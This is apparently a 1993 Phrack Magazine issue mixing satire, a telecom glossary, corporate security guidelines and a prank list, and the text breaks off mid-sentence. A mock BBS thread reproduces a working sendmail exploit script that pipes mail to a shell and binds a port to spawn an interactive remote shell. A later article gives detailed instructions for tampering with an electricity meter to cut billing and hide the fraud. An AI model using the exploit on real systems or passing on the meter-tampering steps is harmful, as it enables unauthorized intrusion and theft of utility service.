Sendmail bug is a bug that works using sendmail. This bug works on hosts using sendmail and can allow people to do things from remote through sendmail. I know the bug, but I'm not going to give it out. Forum Members can get it from the Database on CertNet. UnCERTian Future [A]uto reply [N] [R]e-read [Q]uit:N Number :) 225 From :) The BeanCounter Subject :) SENDMAIL ED: I DON'T HAVE ACCESS TO THE DATABASE ON CERTNET. COULD YOU SEND IT TO ME IN EMAIL? WHM [A]uto reply [N] [R]e-read [Q]uit:N Number :) 226 From :) Uncertian Future Subject :) Bill... Yes, you do. All Members of The Forum have access. I will call you and tell you how to access it. Remember, UNIX is case sensitive. If this is a problem, you will have to use another computer. UnCERTian Future Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 227 From :) Information Warrior Subject :) InterNuts I have been having a really dumb conversation on the net with a moron who wants to argue about HERF with ME! WITH ME! Can you believe it? I almost want to strangle the guy. Some college kid, but still... The new file is due out soon. I will place it in the upload section in .zip format. Someone will have to unzip it for Donn and Bill. I don't think they have figured that utility out yet. [A]uto reply [N] [R]e-read [Q]uit:N Number :) 228 From :) Hackman Subject :) Sendmail Bug. Dig it. You Forum people piss me off. Turn on your buffers everyone cuz here comes the bug. Fuck you if you don't like it. ------Cut Here-------- #!/bin/sh # Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com) # # This material is copyrighted by Scott Chasin, 1992, 1993. The # usual standard disclaimer applies, especially the fact that the # author is not liable for any damages caused by direct or indirect # use of the information or functionality provided by this program. # # Description: # # Exploit NEW sendmail hole and bind a port so we can spawn a program. # Not for distribution under any circumstances # # Usage: smail # default: smail <7001> port=$3 user=$2 cmd=$4 if [ -z "$2" ]; then user=daemon fi if [ -z "$3" ]; then port=7002 fi if [ -z "$4" ]; then cmd="/bin/csh -i" fi ( sleep 4 echo "helo" echo "mail from: |" echo "rcpt to: bounce" echo "data" echo "." sleep 3 echo "mail from: $user" echo "rcpt to: | sed '1,/^$/d' | sh" echo "data" echo "cat > /tmp/a.c < #include #include #include #include reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac; int **av;{struct sockaddr_in mya;struct servent *sp ;fd_set muf;int myfd,new,x,maxfd=getdtablesize(); signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM, 0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr, sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp")) ==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port =htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd, (struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd, 1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if (select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork() ==0){for(x=2;x Why did I take this job? L.O.S.T Girl Number :) 231 From :) American Eagle Subject :) That post How do you use that bug? I tried typing it in,but got a lot of errors. Is it for some special operating system? Or do you have to type it in on a special port? American Eagle Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 232 From :) Zen Subject :) New Program The new version of COPS is available for Download. Zero Day Ware! Get it fast. I will u/l updates/ bug fixes later... Gotta love all them filepoints! Off to play Xtank Zen Legion Of Security Types [A]uto reply [N] [R]e-read [Q]uit:N Number :) 234 From :) Spaf Master Subject :) !@!# Ur Pr0grA/\/\ 1z amUz1nG, But Un3l3eT Eye p0Ss3z 1 0F mUch gR3aTr aB1liTy thAt Th3 4-m w1lL Us3. Ch3Ck th3 DatAbaS3 0n CERT-NET. D3aTh 2 LOST --spaf Forum Of OverLordS Number :) 235 From :) Sysop Subject :) WARNING! Someone has given out the NUP. Some cracker type has attempted to access the bbs as of last night. I will call UnCERTain Future to put out an advisory on this issue. Please do not give out the NUP to anyone. THIS IS A PRIVATE BBS! [A]uto reply [N] [R]e-read [Q]uit:N End of Messages [A]uto reply [N] [R]e-read [Q]uit:Q ******************************************************************************* ============================================================================= CA-93:16 CERT Advisory October 23, 1993 Hacker/Cracker Vulnerabilities ----------------------------------------------------------------------------- The CERT Coordination Center has learned of several vulnerabilities in the language used on the USENET system. This vulnerability affects all users running rn, tin or other USENET news readers as well as users holding discussions containing the words "hacker" or "cracker". Patches can be obtained from your local phrack archive as well as through anonymous FTP to they ftp.netsys.com (192.215.1.2) system. Information concerning specific patches is outlined below. Please note that phrack sometimes updates patch files. If you find that the checksum is different, please contact phrack. ----------------------------------------------------------------------------- I. Hack and Crack Vulnerabilities These vulnerabilities affect all systems running a USENET news- reader including rn and tin, as well as all conversations, papers and stories involving the words "Cracker" and/or "Hacker". ** This vulnerability is being actively exploited and we strongly recommend that sites take immediate and corrective action. ** A. Description A vulnerability exists in the words "Hacker" and "Cracker" such that users may become confused as to exactly who/what you are talking about when used in a sentence. B. Impact Unauthorized confusion to affected conversations may ensue. C. Solution We recommend that all affected sites take the following steps to secure their systems. 1. Obtain and install the appropriate patch following the instructions included with the patch. System Patch ID Filename Checksum ------ -------- --------------- --------- all 10288 10288.tar.Z 5551 212 The checksums shown above are from the BSD-based checksum. 2. If your conversation is found to have been compromised by the word "Hacker" or "Cracker", we recommend you flame all parties involved and immediately break up the discussion by talking about the "correct" meaning of the words. 3. Depending upon the sensitivity of the information contained in your conversation, you may wish to replace the existing conversation with one discussing (a) the NSA, (b) the BATF (c) The Kennedy Assasination, (d) why shadowing password schemes are helpful or hurtful or (e) which file editor is actually the best. --------------------------------------------------------------------------- The CERT Coordination Center wishes to thank the Rogue Agent, (Rogue Agent/ SoD!/TOS/KoX), the letter 'Q' and the number '55' for reporting these vulnerabilities and Phrack, Inc. for their response to these problems. --------------------------------------------------------------------------- If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in FIRST (Forum of Incident Response and Security Teams). Internet E-mail: cert@cert.org Telephone: 412-268-7090 (24-hour hotline) CERT personnel answer 8:30 a.m.-5:00 p.m. EST(GMT-5)/EDT(GMT-4), and are on call for emergencies during other hours. CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 Past advisories, information about FIRST representatives, and other information related to computer security are available for anonymous FTP from cert.org (192.88.209.5). ******************************************************************************* [** NOTE: The following file is presented for informational and entertainment purposes only. Phrack Magazine takes NO responsibility for anyone who attempts the actions described within. **] Power to the People A little theory to get you started: Watts=Current * Voltage A power meter consists of a voltage coil, a current coil, a small motor to drive the dials, and little else. Given the formula above, if we can somehow cut down the voltage that the meter 'sees', then we can reduce the number of watts that it measures. If we cut our voltage in 1/2, our watts also get cut in half. Fortunately, your meter doesn't read the voltage directly off of the lines into your house. Two small wires lead to the voltage coil within the meter. Simple modification to this circuit is all that is needed. Inserting a resistor in series with the voltage coil will cut the voltage that the meter sees, and therefore that wattage that it reads. Meters read Kilowatts per hour, and you pay so much for each kilowatt. Since the hours remain constant (unless your stuck in one of those nasty little dimensional time warps..and I really hate it when that happens), your bill is directly related to what resistor value you insert. Do this correctly, and carefully, you will save a bundle on the power you use. Say I cut my bill by $40 per month..$40 * 12 months = $480 saved with a original 'investment' of $5 that is a 96 fold return on your investment. This idea also might be used to provide a service to your trusted friends, $100 bux a mod or so..$$$ One last little caution before you begin, don't go messing around with the adjustment screws you will find, usually there are 2 of them with F & S marked near them. I had the foolish idea to mess with these, the result is when I am drawing very little power (a few watts) my meter will slowly run backwards. Next time I'm modifying it, I'll have to fix that. Mr. Meter Reader would really wonder what the heck was going on when he saw that. (Mr. Meter Reader will be thinking he's done far to many drugs on the weekend..or needs to be.) SUPPLIES NEEDED: (2) Power meters. You'll perform the mod on one, and use the other to have in while you're doing it. (1) Length of heat shrink tubing, a sufficient size to cover a half watt resistor. (Some) half-watt resistors, 10k-25k or so. (A 10K resistor will cut your bill in half...15K quit a bit more (the amount saved, is NOT linear to the resistor value..more like a logarithmic scale) (some) Good old 100% silicon caulk Soldering iron, solder, lots of nerve. To begin the Mod: Take the little 'lock' they use (little plastic deal), and chuck it. Wait about 2 months for the reader to get used to the fact it's gone..the idea is that if they think you've tampered with it cause the lock is gone..they will check and find no tampering then..(least that's the idea) If you happen to know someone who works for the power company, and can get your hands on some of those locks, get a few new ones, and let them 'age' outside for a few months (to get that used look), then replace yours with it when done. And if anyone happens to know of a source for these locks, I would appreciate knowing. You'll need to 'find/get/steal/snag/etc' another meter to put in while your fixing your..(kinda hard to see/solder with no power) ;) Lift the now unlocked cover and pull meter out..(simply pulls out of the socket real easy) put other meter in for a while..(do at night would be a good idea..neighbors would wonder what the heck you were doing eh?) On the side of the meter, there will be a little (probably copper), pin, that is designed to break when you unbend the end of it..(security device). Be real careful and try not to break it when you bend it back (if it breaks, save the piece that broke off) Pull that out, and then turn the ring that holds the unit together..it should then come apart real easy. Between the assembly where the wheel is and the base plate, look in the gap, there should be a black deal that looks like a transformer attached to the core of the meter and 2 black wires leading from the prongs of the meter base to the smaller coil. This is the voltage coil. Here comes the fun part! Cut one of the wires, being sure you cut where you can hide the damage later. Solder in 10k or 15k resistor with the leads of resistor cut off right at resistor body, and also put the heat shrink tubing on the resistor, and shrink it..(with heat preferably) ;) Take silicone rubber (the 100% pure stuff..) and glue the resistor and the shrunk tubing over it underneath the top assembly. Make it appear that the wires simply curve up that way and nothing more. Put ring back on. Notice that you must put the meter together exactly the way it came apart. Example: on mine, i noticed that there was dirt on the bottom from rain splashing mud onto the meter. It would look kinda obvious if the mud suddenly appeared on top of the meter. Take the little pin that you removed (copper thing) and replace it in the hole and through the ring as before. Bend the end back up like before also if it broke, bend what is left anyways, there should be plenty left to bend. Take the broken end (if it broke), and jam it under the end of the bend to make it look legit. If they do pull the meter to inspect, they will hopefully just think that it might have broke loose when it was installed. I have noticed on some unmodified meters that I 'found' that the security pin has been broken already. So It's reasonable safe to assume that they don't take much faith in them. When done, you should NOT be able to tell if any mods have been done by looking. Be sure it's undetectable, they get kinda mad when you do things like this for some odd reason. It's suggested that after the modification, you have a friend, who you trust not to fink, take a very close look to see if they can spot any mods. Your bill should drop in half or more..if you really want to drop the bill..do this in steps.. a few months apart..so they won't notice that your bill is dropping like a rock. Just don't get silly. Using only 1kwh per month just yells fraud. Mine went from $80-$90 a month to around $30-$37 month with a 10K resistor (I added a electric dryer and other items during that month also.) You might want to try this a few times on other meters you've 'found' just to get the nack of it first, it should work with all meters. At least the ones they use in my area. Table of comparisons: test made using 1320 watt electric heater. 120V 11 amps 1.3 KWH resistor value rev per time voltage cross resistor rev/hour ------------------------------------------------------------------------------ 0 1 rev/23 seconds 0 156 1k 1 rev/24 seconds 9. 150 10K 1 rev/42 seconds 63 85 12k 1 rev/53 seconds 68 39K 1 rev/464 seconds ??? 7.25 Notice the 39K resistor's performance, NOT a good choice to use, it will cut your bill to 4% of the original. They will wonder about this. I'm currently using 10K which will cut it to approx 54% of the original bill. My bill is around 1/2 previous. Saving me approx $30-$50 a month in power bills. Not bad for a 10 cent resistor. Keep in mine the wattage rating of the resistor. Measure the voltage across the resistor. Take that number divide it by the resistor your using to get current. Take the current times current (square it), and multiply this by resistance value to get the wattage of resistor that is required. After all, it would not be a good thing for the resistor to go up in smoke. Mr. Meter Reader would wonder why you used 0 kwh this month. There also is another method that in theory will make your power bill less, this is called 'power factor correction', but unfortunately requires the use of some rather large (read expensive) AC cap's. For this reason (and the fact it cost under $5 and provides more of a benefit), the method of using the resistor is more useful and do-able by the everyone (especially those who despise the 'system'). Notice that I have NOT left a email address or the like for correspondence, namely due to the fact that this is highly illegal and greatly frowned upon by the authorities. If anyone has a need to contact me they may do so via phrack magazine, they can forward mail to me. If you do this modification correctly and per instructions, you will indeed save money. Have fun, be careful, and challenge the system at every turn. ******************************************************************************* DATA BANK OF THE GERMAN SPEAKING AN-ARCHISM The Da.d.A. Project DAtenbank des Deutschsprachigen Anarchismus Berlin, Koln The history of the liberative movement has not yet been filed sufficiently. That is, mainly, due to the lack of scientists with interest in exploring this area. Thanks to that, people who need bibliographic information for some specific themes of the history of anarchism, must go through all direct sources and derive from those some conclusions. Things are more difficult in case modern literature is required, for the theory and practice of liberative movements, which have appeared in the meantime. The data bank of the German speaking anarchism (DAtenbank des Deutschsprachigen Anarchismus) is trying to cover the lack of bibliographic material. Currently it files anarchistic or, generally, liberative documents and publishes. Later it will comprehend documents which deal with the history and theory of those movements. We are focusing our compilation activities, to the German speaking areas with plans of enhancing that shortly. In parallel we are elaborating an introduction to the publishing history of the printed material, which will be informative for their political and editorial meanings. From the early 1980's, the filing of the German liberative press is open for exploration. It covers the chronological period from the philosophic commencements of the German anarchism, in the 1832, until nowadays. Strength of expression is given to newspapers and magazines, though collections of documents, almanacs, year-books, congresses' protocols and catalogs are not omitted. Except of the anarchistic publishes we are also registering material whose cooperatives or publishers were anarchists. The filing is achieved using all the usual bibliographical criterion (titles, publishers, date/district, circulation, place of distribution et cetera). In order to handle the increasing demands of the people who would like to access our material, we decided to publish our first synthetic registers in a series of brochures. This publication, in restricted copies and four or five continuations, will be available at the "File of Social and Civilization History" of the 'Libertad' publications in Berlin. The first brochure, is occupied with the German liberative press from 1832 to 1890. Every copy of this serial includes a diagram of the press' history, chronological bibliography of the magazines and an index. We resume special researches through the data bank and we offer the results printed. Until now we have filed over 1000 titles, which offer many different elements for research each. Da.d.A. is a private, research project. We do not accept donations from state institutions and other similar organizations. In that way we can continue our efforts undistracted and independent. The disadvantage is that we support Da.d.A. with personal expenses and when we have free time available. The modern liberative press is difficult to register and get filed. Although liberative publications were developed in an unprecedented way (and not only arithmetically) after 1968, few publications are accessible from libraries and files. Especially today we must tune up our practises in order to protect modern press. We encourage every publisher of anarchistic material, even if productions are ceased nowadays, to send us information and, if possible, a copy of their publications. They will get registered in our computer and filed in the library for the Research of Social Demands, in order to be accessible for studies in the future. For more information about the Da.d.A. project and the possibilities of using the data bank, you can contact us in the following addresses: BERLINER GESELLSCHAFT ZUM STUDIUM SOZIALER FRAGEN e.V. Projekt: Datenbank des Deutschsprachigen Anarchismus (Da.d.A.) c/o Jochen Schmuck c/o Gunter Hoering Postfach 440 349 Pfalzer Str.27 1000 BERLIN 44 5000 KOLN 1 Tel. 030/686 65 24 Tel. 0221/21 81 49 ******************************************************************************* [Don't ask me why I'm printing this. I just think it's funny as hell.] 100 WAYS TO FREAK OUT YOUR ROOMMATE 1. Smoke jimson weed. Do whatever comes naturally. 2. Switch the sheets on your beds while s/he is at class. 3. Twitch a lot. 4. Pretend to talk while pretending to be asleep. 5. Steal a fishtank. Fill it with beer and dump sardines in it. Talk to them. 6. Become a subgenius. 7. Inject his/her twinkies with a mixture of Dexatrim and MSG. 8. Learn to levitate. While your roommate is looking away, float up out of your seat. When s/he turns to look, fall back down and grin. 9. Speak in tongues. 10. Move you roommate's personal effects around. Start out subtle. Gradually work up to big things, and eventually glue everything s/he owns to the ceiling. 11. Walk and talk backwards. 12. Spend all your money on Jolt Cola. Drink it all. Stack the cans in the middle of your room. Number them. 13. Spend all your money on Transformers. Play with them at night. If your roommate says anything, tell him/her with a straight face, "They're more than meets the eye." 14. Recite entire movie scripts (e.g. "The Road Warrior," "Repo Man," Casablanca,") almost inaudibly. 15. Kill roaches with a monkey wrench while playing Wagnerian arias on a kazoo. If your roommate complains, explain that it is for your performance art class (or hit him/her with the wrench). 16. Collect all your urine in a small jug. 17. Chain yourself to your roommate's bed. Get him/her to bring you food. 18. Get a computer. Leave it on when you are not using it. Turn it off when you are. 19. Ask your roommate if your family can move in "just for a couple of weeks." 20. Buy as many back issues of Field and Stream as you can. Pretend to masturbate while reading them. 21. Fake a heart attack. When your roommate gets the paramedics to come, pretend nothing happened. 22. Eat glass. 23. Smoke ballpoint pens. 24. Smile. All the time. 25. Collect dog shit in baby food jars. Sort them according to what you think the dog ate. 26. Burn all your waste paper while eying your roommate suspiciously. 27. Hide a bunch of potato chips and Ho Hos in the bottom of a trash can. When you get hungry, root around in the trash. Find the food, and eat it. If your roommate empties the trash before you get hungry, demand that s/he reimburse you. 28. Leave a declaration of war on your roommate's desk. Include a list of grievances. 29. Paste boogers on the windows in occult patterns. 30. Shoot rubber bands at your roommate while his/her back is turned, and then look away quickly. 31. Dye all your underwear lime green. 32. Spill a lot of beer on his/her bed. Swim. 33. Bye three loaves of stale bread. Grow mold in the closet. 34. Hide your underwear and socks in your roommate's closet. Accuse him/her of stealing it. 35. Remove your door. Ship it to your roommate's parents (postage due). 36. Pray to Azazoth or Zoroaster. Sacrifice something nasty. 37. Whenever your roommate walks in, wait one minute and then stand up. Announce that you are going to take a shower. Do so. Keep this up for three weeks. 38. Array thirteen toothbrushes of different colors on your dresser. Refuse to discuss them. 39. Paint your half of the room black. Or paisley. 40. Whenever he/she is about to fall asleep, ask questions that start with "Didja ever wonder why...." Be creative. 41. Shave one eyebrow. 42. Put your mattress underneath your bed. Sleep down under there and pile your dirty clothes on the empty bedframe. If your roommate comments, mutter "Gotta save space," twenty times while twitching violently. 43. Put horseradish in your shoes. 44. Shelve all your books with the spines facing the wall. Complain loudly that you can never find the book that you want. 45. Always flush the toilet three times. 46. Subsist entirely on pickles for a week. Vomit often. 47. Buy a copy of Frankie Yankovic's "Pennsylvania Polka," and play it at least 6 hours a day. If your roommate complains, explain that it's an assignment for your primitive cultures class. 48. Give him/her an allowance. 49. Listen to radio static. 50. Open your window shades before you go to sleep each night. Close them as soon as you wake up. 51. Cry a lot. 52. Send secret admirer notes on your roommate's blitzmail. 53. Clip your fingernails and toenails and keep them in a baggie. Leave the baggie near your computer and snack from it while studying. If he/she walks by, grab the bag close and eye him/her suspiciously. 54. Paste used kleenexes to his/her walls. 55. Whenever your roomate comes in from the shower, lower your eyes and giggle to yourself. 56. If you get in before your roomate, go to sleep in his/her bed. 57. Put pornos under his/her bed. Whenever someone comes to visit your roommate when they're not home, show them the magazines. 58. Whenever you go to sleep, start jumping on your bed . . . do so for a while, then jump really high and act like you hit your head on the ceiling. Crumple onto your bed and fake like you were knocked out . . . use this method to fall asleep every night for a month. 59. If your roommate goes away for a weekend, change the locks. 60. Whenever his/her parents call and ask for your roommate, breathe into the phone for 5 seconds then hang up. 61. Whenever he/she goes to shower, drop whatever you're doing, grab a towel, and go shower too. 62. Find out your roommate's post office box code. Open it and take his/her mail. Do this for one month. After that, send the mail to him/her by UPS. 63. Collect all of your pencil shavings and sprinkle them on the floor. 64. Create an imaginary cat for a pet. Talk to it every night, act like you're holding it, keep a litter box under your desk. After two weeks, say that your cat is missing. Put up signs in your dorm, blame your roommate. 65. Call safety & security whenever your roommate turns up his/her music. 66. Follow him/her around on weekends. 67. Sit on the floor and talk to the wall. 68. Whenever the phone rings, get up and answer the door. 69. Whenever someone knocks, answer the phone. 70. Take his/her underwear. Wear it. 71. Whenever your roommate is walking through the room, bump into him/her. 72. Stare at your roommate for five minutes out of every hour. Don't say anything, just stare. 73. Tell your roommate that someone called and said that it was really important but you can't remember who it was. 74. Let mice loose in his/her room. 75. Give each of your walls a different name. Whenever you can't answer a problem, ask each of your walls. Write down their responses, then ask your ceiling for the final answer. Complain to your roommate that you don't trust your ceiling. 76. Take your roommate's papers and hand them in as your own. 77. Skip to the bathroom. 78. Take all of your roommate's furniture and build a fort. Guard the fort for an entire weekend. 79. Gather up a garbage bag full of leaves and throw them in a pile in his/her room. Jump in them. Comment about the beautiful foliage. 80. When you walk into your room, turn off your lights. Turn them on when you leave. 81. Print up satanic signs and leave them in your room where he/she can find them. 82. Whenever you're on the phone and he/she walks in, hang up immediately without saying anything and crawl under your desk. Sit there for two minutes than call whoever it was back. 83. Insist on writing the entire lyrics to American Pie on your ceiling above your bed. Sing them every night before you go to bed. 84. Use a bible as Kleenex. Yell at your roommate if they say Jesus or God Damnit. 85. Burn incense. 86. Eat moths. 87. Buy Sea Monkeys and grow them. Name one after your roommate. Announce the next day that it died. Name another one after your roommate. The next day say that it died. Keep this up until they all die. 88. Collect Chia-Pets. 89. Refuse to communicate in anything but sign language. 90. Eat a bag of marshmallows before you go to bed. The next day, spray three bottles of whipped cream all over your floor. Say you got sick. 91. Wipe deodorant all over your roommate's walls. 92. If you know that he/she is in the room, come barging in out of breath. Ask if they saw a fat bald naked Tibetan man run through carrying a hundred dollar bill. Run back out swearing. 93. Leave apple cores on his/her bed. 94. Keep feces in your fridge. Complain that there is never anything to eat. 95. Piss in a jar and leave it by your bed. When your roommate isn't looking, replace it with a jar of apple juice. Wait until your roommate turns around. Drink it. 96. Don't ever flush. 97. Buy an inflatable doll. Sleep with it. 98. Hang stuffed animals with nooses from your ceiling. Whenever you walk by them mutter, "You shouldn't have done that to me." 99. Lick him/her while they are asleep. 100. Dress in drag. ******************************************************************************* ==Phrack Magazine== Volume Four, Issue Forty-Four, File 4 of 27 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ****************************************************************************** SOUTHWESTERN BELL TELEPHONE Computer Security Guidelines Computer Security is YOUR Responsibility. These guidelines are designed to help you know and meet your corporate obligation. Prepared by: Information Systems Computer Security Administration One Bell Center 22-H-8 St. Louis, MO 63101 For Users --------- Keep your logon and password information private. Do not write down passwords, but if you must, keep them in a locked place. Do not store your password in the computer. Make sure no on sees you enter your passwords. Pick non-obvious, non-guessable passwords. Do not share your logons or passwords. Change passwords periodically, at least every thirty days. Open new computer logons for computer resources only when you have a real need. Close computer logons you no longer need. Make sure you have proper protection settings on sensitive computer files. Do not send confidential information through electronic mail or computer news systems. If you suspect security violations, tell management immediately. Be sure that use of computing resources is for company approved purposes only. Do not access any information that your management has not authorized you to have. When in doubt, ask! Logoff when you leave your terminal. If you dialed in, disconnect when you are finished working. For Managers of Computing Facilities ------------------------------------ Provide procedures to control access to computing resources. Provide facilities to let users protect proprietary information from disclosure to unauthorized persons. Be sure that connection of a computer to any network does not diminish the control a user has over programs and data. Provide appropriate security facilities and procedures to protect computing hardware against damage. Provide facilities to protect user's data and programs from undesired changes or destruction. Ensure that computing resource use has been authorized by a member of supervision. Make sure that computing resource use can be tracked to individuals. Report to managers regularly on the extent of computing resource use. Provide appropriate backup facilities for data and programs. Provide audit trails which identify violations and security breaches and examine them regularly. For assistance in coordinating computer security activities, contact the Computer Security Administrator. For Managers ------------ Make sure you authorize all use of computing resources and that you require separate logons for each individual. Make sure that the user of computer resources understands responsibilities with respect to proper use and security consciousness. Review computing resource usage reports and the security practices of the users for which you are responsible. When a user's employment or need for access ends or changes, make sure access to computer resources is promptly changed by notifying your System Administrator. Report security violations to the General Security Manager and to the Computer Security Administration Group. For Information --------------- The Information Systems Organization provides security and disaster recovery services to establish, monitor, and audit computer security standards. If you have any comments or questions regarding computer security, please contact the Computer Security Administration. ******************************************************************************* RBOC ORGANIZATIONAL ARCHITECTURE Compiled By Phrack Magazine In an effort to assist the hacking world in their understanding of the organizational mess created by our fabulous friends at the RBOCs, we have compiled a list of the various organizations, what their functions are, which centers they are made up of, and which computer systems they use. ----------------------------------------------------------------------------- Planning and Engineering Defines network resources available for assignment Functions: Long range and current planning for outside plant, wire centers, interoffice network, special services, interexchange access services, and message trunks Exchange network design Coordination of activities connected with installation and/or modification of exchange network components Centers: DSPC SCPC WCFPC CAC IFFPC IFCPC TEC MEC DSDC EEC CSEC Systems: LEIS NPS FEPS LSRP INPLANS INFORMS DFDS SSFS PICS LATIS CAMIS CUCRIT ----------------------------------------------------------------------------- Service Provisioning Allocates assignable existing network resources Functions: Circuit design and routing Verification and assignment of network elements Controlling and tracking orders during assignment process Centers: CPC - Circuit Provisioning Center LAC - Loop Assignment Center Systems: TIRKS SOAC SWITCH COSMOS WM LFACS LOMS ----------------------------------------------------------------------------- Network Operations Controls installation, maintenance and testing of circuits Functions: Coordination and performance of the activities required to provide service Surveillance and control of network equipment and facilities Analysis, sectionalization, and repair of switching and transmission facilities Status reporting on service order and/or service restoration activities Centers: CRSAB ICC MC NAC RCMAC SEAC SSC FMAC STC DNCC FCC SCC Systems: McTE GDS LMOS EADAS TAN RSA CRAS CIMAP NDS SEAS MAS MIZAR SARTS TCAS CAROT NMA NMPS SCCS ----------------------------------------------------------------------------- Customer Services Direct company contact with customers Functions: Service negotiation with customers Creating and routing associated service orders Creating and maintaining customer records Reporting the provisioning status to customers Initiating billing and collection processes Handling billing and general service inquiries Centers: RSC - Residence Service Center BSC - Business Service Center ICSC - Interexchange Carrier Service Center Systems: BOFADS - Business Office Force Administration Data System PREMIS - Premises Information System SOP - Service Order Processor CABS - Carrier Access Billing System BOSS - Billing and Order Support System CRIS - Customer Records Information System BRIS - Business Revenue Information System CLAIMS ----------------------------------------------------------------------------- Quick Breakdown Process Center System ----------------------------------------------------------------------------- Planning & Engineering IOF IFCPC IFFPC IOF/EDC FEPS NPS-F Switch SCPC WCPC EEC LSD&F LSRP NDS TNDS/EQ NPS-W Distribution DSPC DSDC LATIS LEIS NPS-D Service Provisioning IOF CAC TIRKS Switch LAC COSMOS Distribution LAC LFACS Network Operations IOF FMAC CAROT CIMAP TCAS TNDS/TK Switch NAC RCMAC SCC EADAS NDS MAS MIZAR TASC CIMAP NMA NMPS SCCS Distribution ICC MC GDS CRAS LMOS/MLT PREDICTOR TAN ******************************************************************************* -IS- Blue Boxing Dead? Australia Direct 800-682-2878 Austria Direct 800-624-0043 Belgium Direct 800-472-0032 Belize Direct 800-235-1154 Bermuda Direct 800-232-2067 Brazil Direct 800-344-1055 British VI Direct 800-248-6585 Cayman Direct 800-852-3653 Chile Direct 800-552-0056 China Direct 800-532-4462 Costa Rica Direct 800-252-5114 Denmark Direct 800-762-0045 El Salvador Direct 800-422-2425 Finland Direct 800-232-0358 France Direct 800-537-2623 Germany Direct 800-292-0049 Greece Direct 800-443-5527 Guam Direct 800-367-4826 HK Direct 800-992-2323 Hungary Direct 800-352-9469 Indonesia Direct 800-242-4757 Ireland Direct 800-562-6262 Italy Direct 800-543-7662 Japan Direct 800-543-0051 Korea Direct 800-822-8256 Macau Direct 800-622-2821 Malasia Direct 800-772-7369 Netherlands Direct 800-432-0031 Norway Direct 800-292-0047 New Zealand Direct 800-248-0064 Portugal Direct 800-822-2776 Panama Direct 800-872-6106 Philippines Direct 800-336-7445 Singapore Direct 800-822-6588 Spain Direct 800-247-7246 Sweden Direct 800-345-0046 Taiwan Direct 800-626-0979 Thailand Direct 800-342-0066 Turkey Direct 800-828-2646 UK Direct 800-445-5667 Uruguay Direct 800-245-8411 Yugoslavia Direct 800-367-9841 / 9842 This file brought to you by The Phone Company ******************************************************************************* ***************************************** * Step-by-step Programming Instructions * * For the EO Cellular Module * ***************************************** 1. Unbox and attach the EO Cellular Module to the E